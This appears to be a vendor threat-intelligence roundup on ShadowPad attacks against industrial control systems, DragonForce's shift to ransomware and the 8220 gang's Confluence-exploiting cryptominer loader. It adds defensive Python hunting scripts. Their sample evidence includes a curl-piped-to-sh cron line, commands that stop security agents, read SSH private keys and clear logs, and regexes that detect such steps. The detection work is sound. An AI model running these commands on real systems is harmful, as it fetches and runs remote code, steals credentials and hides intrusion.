In this report, we explore how a Chinese-speaking advanced persistent threat (APT) group is attacking industrial control systems (ICS) with a revamped variant of the ShadowPad backdoor. In addition, the DragonForce hacktivist collective claims to be pivoting away from activism and towards cybercrime, primarily by deploying ransomware. And finally, Microsoft is warning about major upgrades to the 8220 gang's arsenal, which supports the group's cryptomining activity and is being used to actively exploit a Confluence vulnerability.
Let’s take a closer look at these developing stories.
1. Suspected Chinese APT group uses ShadowPad to attack industrial control systems
A new Kaspersky report describes an active campaign leveraging the ShadowPad backdoor in attacks targeting several industrial control systems (ICS) belonging to telecommunications entities in the Middle East. This wave of attacks, which specifically targets engineering computers in building automation systems (BAS), started in mid-October 2021.
During the investigation of the campaign, researchers found evidence of larger-scale activity and identified additional victims. Furthermore, Kaspersky claims that the campaign is similar to attacks from March 2021 involving an earlier version of the ShadowPad backdoor, as well as the use of a similar set of tactics, techniques, and procedures (TTPs) deployed against logistics and transport organizations at a port in Malaysia.
- Some of the targeted organizations were compromised through CVE-2021-26855 (ProxyLogon) in Microsoft Exchange.
- From March to at least October 2021, the ShadowPad backdoor was downloaded to victim computers as the mscoree.dll file, launched by AppLaunch.exe – a legitimate application executed via the creation of a task in Windows Task Scheduler.
- Later the attackers launched ShadowPad using DLL hijacking in a legitimate OLE-COM object viewing application (OleView).
- After the initial infection, the attackers sent commands manually, then automatically.
- The attackers used domains registered with NameSilo, GoDaddy.com, and ENOM to communicate with the command-and-control (C2) servers. Most of the C2 servers were hosted on dedicated servers rented from managed services provider (MSP) Choopa.
Kaspersky reports that the group used additional tools during the campaign, including the ever-popular Cobalt Strike framework (downloaded to victim machines with the certutil.exe utility), compiled ASPX web shells, ProcDump and Mimikatz. Other tools observed include the PlugX backdoor, BAT files for stealing credentials, web shells for remote access to the web server, and the Nextnet utility for scanning network hosts.
Post-exploitation activity involves the distribution of a malicious script for cmd.exe over victim networks. The script was added to the task scheduler to perform daily execution. There are several commands within the script, but its general goal is to gather system and user information, copy files and stage them for exfiltration, mount network drives using legitimate domain accounts (evidence that the attackers stole domain authentication credentials from at least one account in each attacked organization), launch the Mimikatz credential dumper, and more. Kaspersky asserts that this latter part of the attackers’ TTP strategy is unique, and further supports the researchers’ claims of Chinese state involvement.
ShadowPad: A brief overview
ShadowPad is an advanced modular remote access trojan (RAT) that various Chinese threat groups have used – and are using – to launch attacks against private networks. ShadowPad first appeared back in 2017 and remains a popular attack mechanism.
In the above-mentioned campaign, the ShadowPad backdoor was downloaded on the attacked computers under the guise of the mscoree.dll file, which was launched by the legitimate application AppLaunch.exe located in the same folder as ShadowPad. AppLaunch.exe was executed by creating a task in the Windows Task Scheduler.
New methodology: As mentioned above, Kaspersky reports that since about mid-October 2021 the attackers have been using a new ShadowPad launching scheme and a new malware version against the same types of organizations. Instead of pairing mscoree.dll with AppLaunch.exe, the attackers now rely on DLL hijacking of legitimate software for viewing OLE-COM objects (OleView). When OleView starts, it loads the malicious IVIEWERS.dll placed in its directory, which in turn loads and executes the ShadowPad payload stored alongside it in IVIEWERS.dll.dat. The new ShadowPad version also uses the Windows Task Scheduler to gain and keep a foothold on targeted systems.
A more detailed analysis of modifications made to the new ShadowPad variant is presented in a recent report published by PwC.
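Both launch chains reduce to the same pattern: a trusted host binary copied out of its normal location, a hijackable DLL placed beside it (the application directory is searched first in the Windows DLL search order), and a scheduled task that starts the binary. The Python below is an added example, not code from Kaspersky, PwC or Tanium, of hunting for that pattern over an inventory of scheduled-task actions and directory listings. The inventory is constructed, and the "trusted" installation prefixes for AppLaunch.exe and OleView.exe are assumptions based on default .NET Framework and Windows SDK layouts that should be adjusted to the environment. It generalizes the two chains on the page to a small table of host-binary/sideload-DLL pairs that can be extended.

```python
"""Hunt for ShadowPad-style DLL sideloading started from scheduled tasks.

Added example, not code from Kaspersky, PwC or Tanium. The task actions
and directory listings below are constructed; in practice they would come
from `schtasks /query /v /fo csv` (the "Task To Run" field) and a file
inventory from an EDR or a recursive directory listing.
"""
import ntpath
from dataclasses import dataclass

# Host binaries the campaign abused, mapped to the DLL each will load from
# its own directory if one is present there.
SIDELOAD_PAIRS = {
    "applaunch.exe": "mscoree.dll",   # chain seen March-October 2021
    "oleview.exe": "iviewers.dll",    # chain seen from mid-October 2021
}

# Directories where a copy of the host binary is expected. Assumed from
# default .NET Framework and Windows SDK layouts; adjust per environment.
TRUSTED_PREFIXES = {
    "applaunch.exe": (
        "c:\\windows\\microsoft.net\\framework\\",
        "c:\\windows\\microsoft.net\\framework64\\",
    ),
    "oleview.exe": (
        "c:\\program files (x86)\\windows kits\\",
        "c:\\program files\\windows kits\\",
    ),
}


@dataclass
class TaskAction:
    task_name: str
    task_to_run: str  # executable path only, as in the schtasks field


def _split(command):
    """Lower-case a task command and split it into (dir\\, filename)."""
    path = command.strip().strip('"').lower()
    directory, name = ntpath.split(path)
    return directory.rstrip("\\") + "\\", name


def find_sideload_candidates(tasks, listings):
    """Return one finding per task that runs a known host binary from an
    untrusted directory. `listings` maps a lowercase directory (with a
    trailing backslash) to the set of lowercase filenames it contains.
    Confidence is 'high' when the hijackable DLL sits beside the binary,
    'medium' when only the relocated binary is seen."""
    findings = []
    for t in tasks:
        directory, name = _split(t.task_to_run)
        if name not in SIDELOAD_PAIRS:
            continue
        if any(directory.startswith(p) for p in TRUSTED_PREFIXES[name]):
            continue  # running from where the vendor installs it
        dll = SIDELOAD_PAIRS[name]
        files = listings.get(directory, set())
        findings.append({
            "task": t.task_name,
            "binary": directory + name,
            "sideload_dll": directory + dll if dll in files else None,
            # The .dat companion of the OleView chain is extra corroboration.
            "payload_blob": directory + dll + ".dat" if dll + ".dat" in files else None,
            "confidence": "high" if dll in files else "medium",
        })
    return findings


# Constructed inventory: one benign task running AppLaunch.exe from its
# vendor directory, one relocated AppLaunch.exe with mscoree.dll beside it,
# one relocated OleView.exe with IVIEWERS.dll and its .dat blob, and an
# unrelated task.
SAMPLE_TASKS = [
    TaskAction(r"\Constructed\BenignDotNetJob",
               r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"),
    TaskAction(r"\UpdateCheck", r"C:\ProgramData\Update\AppLaunch.exe"),
    TaskAction(r"\OleTask", r'"C:\Users\Public\Libraries\OleView.exe"'),
    TaskAction(r"\Constructed\UnrelatedUpdater",
               r"C:\Program Files (x86)\Common Files\Vendor\Updater.exe"),
]
SAMPLE_LISTINGS = {
    "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\": {"applaunch.exe", "mscoreei.dll"},
    "c:\\programdata\\update\\": {"applaunch.exe", "mscoree.dll"},
    "c:\\users\\public\\libraries\\": {"oleview.exe", "iviewers.dll", "iviewers.dll.dat"},
}

if __name__ == "__main__":
    for finding in find_sideload_candidates(SAMPLE_TASKS, SAMPLE_LISTINGS):
        print(finding)
```

Run against the constructed inventory, the script reports the two relocated binaries at high confidence and ignores the copy in the .NET Framework directory. A relocated binary with no DLL beside it is still worth a look (the DLL may have been deleted after it was loaded), which is why it is reported at medium rather than dropped.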
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“The emergence of a new ShadowPad variant is worrying, as it has previously been used by various Chinese APTs with some success – and has proven itself a reliable asset for threat actors seeking to engage in supply-chain attacks. CTI is of the opinion that Kaspersky is right on the money with regard to its claims of attribution (although ShadowPad has been leveraged by a variety of state-sponsored APTs over the years), as both the targeted regions and the victimology displayed in these attacks align with traditional Chinese state interests and are frequent victims of the regime’s state-backed cyberespionage attacks. ShadowPad is believed to have been developed by threat actors affiliated with China’s Bronze Atlas APT, and subsequently shared with China’s Ministry of State Security (MSS) and the People’s Liberation Army (PLA) – and by extension, their many hacker affiliates.”
2. Hacktivist group DragonForce Malaysia releases Windows LPE exploit, discloses plans to evolve into a ransomware group
A recent threat intelligence post by CloudSEK details a new exploit from the hacktivist group DragonForce Malaysia that the group says is capable of local privilege escalation (LPE) on Windows servers, along with what it describes as local distribution router (LDR) actions, and that it has aimed at India-based servers.
Who is DragonForce Malaysia?
DragonForce is a Malaysia-based hacktivist group which was once considered comparable to the more well-known Anonymous organization. This hacktivist collective has even described itself as a group “based on ethics and principles that bring good,” and operates social media channels which generate tens of thousands of visitors.
The operation is known for attacking organizations and government entities across the Middle East and Asia. DragonForce’s favorite target is Israel, as evidenced by its launching of multiple operations against the nation and its citizens. The group also owns and operates an online forum where it posts announcements, discusses its latest activities, and conducts recruitment and promotional campaigns using TikTok and Instagram.
The operation’s most recent campaign, OpsPatuk, hit India with a wave of attacks in response to controversial comments by some Indian politicians. Radware released an advisory detailing the campaign, including the vulnerabilities exploited, IOCs, and additional threat groups identified as involved.
DragonForce, like many hacktivist groups, is known for working with other cybercriminal gangs to achieve its goals. The group has followed in the footsteps of other hacktivists by resurfacing during the Russia/Ukraine conflict.
Historically, DragonForce has relied on publicly available attack tools to conduct its campaigns. The group’s pivot towards non-publicly available attack tools marks a significant departure from its usual methods – and perhaps signals some improvement in the group’s technical sophistication. However, this growth does not appear to extend to the group’s choices concerning operational security (OPSEC).
DragonForce recently posted a video detailing its newest exploit, attributing its development to a threat actor named ‘impossible1337.’ The exploit is designed to target Windows server LPE and LDR vulnerabilities, but further technical information about the exploit is not yet publicly available.
The video then shifts direction, as the threat actor details its plan to convert to a ransomware group; even going so far as to preview a ransom note sample to prove the seriousness of its intentions. Following the video, the group published a blog on its website reiterating its goals of conducting large-scale ransomware attacks.
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“What’s most notable about this story is the fact that a hacktivist group is creating its own exploits and making the leap from hacktivism to ransomware – evidence of a conscious decision to make the leap to financially-motivated crime. This shift is significant, as most hacktivists at least attempt to maintain an appearance that conveys a well-intentioned mission; and usually don’t publicize any desires to illegally obtain money via cybercrime. This shift in DragonForce’s motivations may serve as further evidence that the incredible (and increasing) amount of money generated by the ransomware industry is getting too hard to ignore, even for those who started out professing to ‘bring good’ to the world, as DragonForce once claimed.
It’s also interesting that the group posted a video detailing its newest exploit while also announcing its plans to move to ransomware. Considering this group has been upfront about its targeted victims, it has essentially given its targets (as well as law enforcement) a ‘heads up’ as far as what to expect from them in the future. In this case, DragonForce is giving prospective victims a chance to patch Windows servers in advance of a potential Windows LPE or LDR attack.”
3. Microsoft warns: Linux-targeting malware received a big update
Microsoft’s Threat Intelligence Center (MSTIC) posted a series of tweets highlighting significant updates to the TTPs associated with the 8220 gang, a threat actor behind a long-running malware campaign targeting Linux systems.
The Twitter thread describes the campaign’s recent activity and updates to the threat actor’s TTPs, and concludes with the indicators of compromise (IOCs) associated with 8220’s latest attacks. The goal of those attacks appears to be financial, as they involve cryptomining.
Who is the 8220 gang?
The 8220 gang is a Chinese-speaking, Monero-mining threat actor first observed in 2017. The ‘8220’ moniker refers to the actor’s preference for leveraging port 8220 for its C2 communications.
This group is known for infecting hosts running on common cloud services, deploying a custom miner and an Internet Relay Chat (IRC) bot to support further attacks and maintain remote access to victims. Judging by its latest activity, this methodology proved successful enough that 8220 has stuck with similar TTPs to the present day.
Atlassian disclosed a critical bug affecting its Confluence Server and Data Center products (tracked as CVE-2022-26134) on June 2, 2022. Within a week, security firm Check Point counted the 8220 gang among the handful of threat actors exploiting the zero-day flaw to download cryptomining software. This was evidenced by discoveries made by Check Point’s researchers, who during an investigation were able to extract from an infected system a domain and crypto wallet previously linked to 8220.
MSTIC reports that over the last year the group has actively updated its techniques and payloads. Its recent campaign targets i686 and x86_64 Linux systems and uses RCE exploits for CVE-2022-26134 (Confluence) and CVE-2019-2725 (WebLogic) for initial access.
Updates to 8220 TTPs and tools reportedly include the following:
- New cryptominer variant
- New IRC bot
- Use of an exploit for a recently disclosed vulnerability (CVE-2022-26134)
- Use of a loader with detection evasion capabilities that downloads the latest variant of the pwnRig cryptominer and the above-mentioned IRC bot, which runs commands from a C2 server. The loader survives reboots by means of a cron job, or a script that is re-launched every minute as a nohup (no hangup) command.
According to Microsoft, after the 8220 gang gains initial access via CVE-2022-26134, it downloads the aforementioned loader to the system. The loader then changes the host’s configuration to disable security services, downloads a cryptominer, establishes persistence, and scans the network with the MASSCAN port scanner to find other potentially vulnerable servers. Propagation is achieved with the aid of Spirit, a Go-based SSH brute-force tool. The loader also scans the local disk for SSH keys, with which the actor can potentially move laterally by connecting to trusted hosts.
Because the loader clears log files and disables cloud monitoring and other security tools, Microsoft advises admins to enable tamper protection in Defender for Endpoint.
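The behaviours Microsoft lists for the loader (an every-minute cron or nohup relaunch loop, a download-and-execute stage, stopped security agents, cleared logs, SSH key harvesting and MASSCAN sweeps) are each weak signals on their own but rarely occur together on a legitimately administered host. The Python below is an added example, not Microsoft's or Tanium's code, that scores constructed crontab entries and command lines against that set. The regexes are heuristics, and the agent names it treats as "security services" are assumptions standing in for whatever monitoring a given fleet actually runs; both will need tuning to the environment.

```python
"""Score Linux evidence against the 8220 loader behaviours listed above.

Added example, not Microsoft's or Tanium's code. Evidence here is
constructed; in practice feed it crontab output for every user plus
/etc/cron.d, and command lines from auditd execve records or shell history.
"""
import re
from collections import Counter

# One regex per behaviour. The agent names in `disable_security` are
# assumptions standing in for whatever cloud monitoring or EDR agents a
# given fleet runs; extend the alternation to match your own.
RULES = {
    "download_and_execute": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "nohup_relaunch": re.compile(r"\bnohup\b.*&\s*$"),
    "disable_security": re.compile(
        r"^(?=.*\b(systemctl|service|chkconfig)\b)"
        r"(?=.*\b(stop|disable|off)\b)"
        r"(?=.*\b(aegis|yunjing|falcon-sensor|auditd)\b)"),
    "log_clearing": re.compile(
        r"(>\s*/var/log/|\brm\s+(-\w+\s+)*/var/log/|\bhistory\s+-c\b|\bunset\s+HISTFILE\b)"),
    "ssh_key_harvest": re.compile(
        r"(\.ssh/(id_\w+|known_hosts|authorized_keys|config)\b|\bfind\b.*-name\s+['\"]?id_)"),
    "mass_scanning": re.compile(r"\bmasscan\b.*-p\s*\d"),
}

# Five asterisks: a job that fires every minute, the relaunch cadence
# Microsoft describes for the loader.
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(.*)$")


def classify_command(cmd):
    """Names of the behaviours a single command line exhibits, sorted."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))


def classify_cron(line):
    """Behaviours for one crontab entry; [] for comments and ordinary jobs."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    m = EVERY_MINUTE.match(line)
    if not m:
        # A normal schedule can still carry a download-and-execute payload.
        return classify_command(line)
    return ["every_minute_cron"] + classify_command(m.group(1))


def triage(cron_lines, command_lines, min_distinct=3):
    """Count distinct behaviours across all evidence. Any one indicator is
    weak; `min_distinct` of them together is treated as the loader's
    fingerprint."""
    counts = Counter()
    for line in cron_lines:
        counts.update(classify_cron(line))
    for cmd in command_lines:
        counts.update(classify_command(cmd))
    return {"indicators": dict(counts), "suspicious": len(counts) >= min_distinct}


# Constructed evidence. 198.51.100.7 is a documentation-range address.
SAMPLE_CRON = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "* * * * * (curl -fsSL http://198.51.100.7/x.sh||wget -qO- http://198.51.100.7/x.sh)|sh >/dev/null 2>&1",
]
SAMPLE_COMMANDS = [
    "ls -la /opt",
    "systemctl stop aegis && systemctl disable aegis",
    "nohup /tmp/.X11-unix/kthreadd >/dev/null 2>&1 &",
    "cat /root/.ssh/id_rsa /root/.ssh/known_hosts",
    "masscan 10.0.0.0/8 -p22 --rate 5000 -oL /tmp/.scan",
    "echo > /var/log/wtmp; history -c",
]

if __name__ == "__main__":
    print(triage(SAMPLE_CRON, SAMPLE_COMMANDS))
```

On the constructed evidence every one of the seven behaviours fires once and the host is flagged, while the benign certbot job and `ls` contribute nothing. The threshold matters: an administrator stopping auditd during maintenance or reading their own known_hosts should not trip an alert, which is why a single indicator is recorded but not escalated.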
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“This is technically not a new threat, but rather an updated and more effective version of an existing one. As this story suggests, Microsoft is increasing its efforts to bring awareness to Linux-targeting malware — an initiative CTI believes should be commended. With regard to the 8220 gang’s updated arsenal, this is the output of a threat actor who has landed on a methodology that has proven successful, and thus has apparently spent the last year updating its malware and deployment techniques in what CTI would describe as an attempt to increase its attacks’ rates of success even further. This shows a high degree of dedication and is also indicative of a group for which cryptomining is a true occupation, as opposed to a side gig. 8220’s increasing sophistication is a sign that its methods are working, as this kind of development takes time, but more importantly, financial resources. The bottom line is that 8220 is an emerging threat and should be treated as such.”
Explore the Tanium Community
Cyberthreats are always evolving, which is why it’s important to stay in the loop about the latest developments. And here at Tanium, we are committed to helping you stay informed and prepared.
Be sure to check back soon for our next intelligence roundup. In the meantime, you can discover emerging cybersecurity issues, announcements, and discussion forums on our Tanium Community.